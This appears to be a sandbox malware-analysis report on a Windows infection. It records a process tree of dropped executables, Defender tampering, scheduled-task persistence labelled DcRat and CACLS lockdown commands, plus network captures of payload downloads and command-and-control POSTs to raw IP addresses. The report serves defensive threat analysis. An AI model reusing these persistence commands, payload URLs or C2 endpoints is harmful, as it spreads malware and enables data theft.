    PID:4924
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,16992271837517745640,12487429834652012642,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
    3⤵
    PID:5628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2704 -ip 2704
1⤵
PID:2208

C:\Users\Admin\AppData\Local\Temp\EF16.exe
C:\Users\Admin\AppData\Local\Temp\EF16.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1268
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:2484
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 416
  2⤵
  - Program crash
  PID:4988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1268 -ip 1268
1⤵
PID:1492

C:\Users\Admin\AppData\Local\Temp\F263.exe
C:\Users\Admin\AppData\Local\Temp\F263.exe
1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:4828

C:\Users\Admin\AppData\Local\Temp\F9A7.exe
C:\Users\Admin\AppData\Local\Temp\F9A7.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:2132
- C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3720
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:3340
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
    3⤵
    PID:5332
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:5556
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:N"
      4⤵
      PID:5584
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:R" /E
      4⤵
      PID:5604
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:N"
      4⤵
      PID:5816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:5800
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:R" /E
      4⤵
      PID:6004
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
    3⤵
    - Loads dropped DLL
    PID:5336

C:\Users\Admin\AppData\Local\Temp\FCD5.exe
C:\Users\Admin\AppData\Local\Temp\FCD5.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:4748
- C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
  "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5956
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:6044
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
    3⤵
    PID:6080
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "oneetx.exe" /P "Admin:N"
      4⤵
      PID:1964
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:372
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "oneetx.exe" /P "Admin:R" /E
      4⤵
      PID:4188
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\207aa4515d" /P "Admin:N"
      4⤵
      PID:5204
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:3660
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\207aa4515d" /P "Admin:R" /E
      4⤵
      PID:5188

C:\Users\Admin\AppData\Local\Temp\1158.exe
C:\Users\Admin\AppData\Local\Temp\1158.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3660 -ip 3660
1⤵
PID:3376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4612 -ip 4612
1⤵
PID:3136

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5164

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5260

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
- Executes dropped EXE
PID:5944

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:5936

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
- Executes dropped EXE
PID:4612

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:5196

Network

DNS

14.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.160.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

26.35.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.35.223.20.in-addr.arpa

IN PTR

Response
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

158.240.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

158.240.127.40.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yxqebntch.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 244
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nhqwvqw.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 118
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dbfbx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 244
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vfxnswj.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 194
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fcaua.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 177
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://plbsjdqjxo.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 326
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 41
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gljub.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 298
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wqcsnrwfxi.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 210
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nbjegv.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 356
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hrhdywxx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 161
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://plfywyqrik.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 292
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:27 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://svxefrql.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 337
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:27 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lopvytwn.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 324
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hsqkxqn.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 341
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 40
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nusgtk.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 337
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jtcaroruj.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 137
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pjllfceav.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 147
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hsghe.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 325
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ylisfvkk.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 267
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ubmcf.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 176
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 84
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://iltnjyx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 129
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yqtwrj.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 166
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=79
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lrqftp.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 189
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
GET

http://77.91.68.52/fuza/2.bat

Remote address:

77.91.68.52:80

Request

GET /fuza/2.bat HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.52

Response

HTTP/1.1 200 OK

Date: Sun, 08 Oct 2023 16:34:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 12:20:15 GMT
ETag: "4f-6069290455a40"
Accept-Ranges: bytes
Content-Length: 79
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

52.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

52.68.91.77.in-addr.arpa

IN PTR

Response

52.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
GET

http://5.42.65.80/rinkas.exe

Remote address:

5.42.65.80:80

Request

GET /rinkas.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Oct 2023 16:34:28 GMT
Content-Type: application/octet-stream
Content-Length: 202752
Last-Modified: Wed, 07 Jun 2023 07:03:22 GMT
Connection: keep-alive
ETag: "64802bba-31800"
Accept-Ranges: bytes
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
GET

http://185.216.70.222/trafico.exe

Remote address:

185.216.70.222:80

Request

GET /trafico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 185.216.70.222

Response

HTTP/1.1 200 OK

Date: Sun, 08 Oct 2023 16:34:33 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sun, 08 Oct 2023 09:48:51 GMT
ETag: "6a600-6073161914646"
Accept-Ranges: bytes
Content-Length: 435712
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

222.70.216.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

222.70.216.185.in-addr.arpa

IN PTR

Response
GET

http://45.9.190.201/Altchrome_TB.exehttp://45.9.190.201/Altchrome_TB.exe

Remote address:

45.9.190.201:80

Request

GET /Altchrome_TB.exehttp://45.9.190.201/Altchrome_TB.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 45.9.190.201

Response

HTTP/1.1 404 Not Found

Date: Sun, 08 Oct 2023 16:34:35 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 274
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
DNS

201.190.9.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

201.190.9.45.in-addr.arpa

IN PTR

Response
DNS

157.123.68.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

157.123.68.40.in-addr.arpa

IN PTR

Response
DNS

1.208.79.178.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.208.79.178.in-addr.arpa

IN PTR

Response

1.208.79.178.in-addr.arpa

IN PTR

https-178-79-208-1amsllnwnet
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

254.177.238.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.177.238.8.in-addr.arpa

IN PTR

Response
POST

http://5.42.92.211/loghub/master

AppLaunch.exe

Remote address:

5.42.92.211:80

Request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=UBoBUc5Q1n9yXHsPQJk3
Content-Length: 213
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 5.42.92.211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Oct 2023 16:34:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
DNS

211.92.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.92.42.5.in-addr.arpa

IN PTR

Response

211.92.42.5.in-addr.arpa

IN PTR
DNS

accounts.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
DNS

141.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.179.250.142.in-addr.arpa

IN PTR

Response

141.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f131e100net
DNS

www.facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.201.35
DNS

static.xx.fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

157.240.210.14
DNS

35.201.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.201.240.157.in-addr.arpa

IN PTR

Response

35.201.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams4facebookcom
DNS

14.210.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.210.240.157.in-addr.arpa

IN PTR

Response

14.210.240.157.in-addr.arpa

IN PTR

xx-fbcdn-shv-01-ham3fbcdnnet
DNS

facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

facebook.com

IN A

Response

facebook.com

IN A

157.240.210.35
POST

http://77.91.124.1/theme/index.php

explothe.exe

Remote address:

77.91.124.1:80

Request

POST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 08 Oct 2023 16:34:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

fbcdn.net

IN A

Response

fbcdn.net

IN A

157.240.210.35
DNS

fbsbx.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A

Response

fbsbx.com

IN A

157.240.210.35
DNS

35.210.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.210.240.157.in-addr.arpa

IN PTR

Response

35.210.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ham3facebookcom
DNS

1.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.124.91.77.in-addr.arpa

IN PTR

Response

1.124.91.77.in-addr.arpa

IN PTR
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Oct 2023 16:34:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

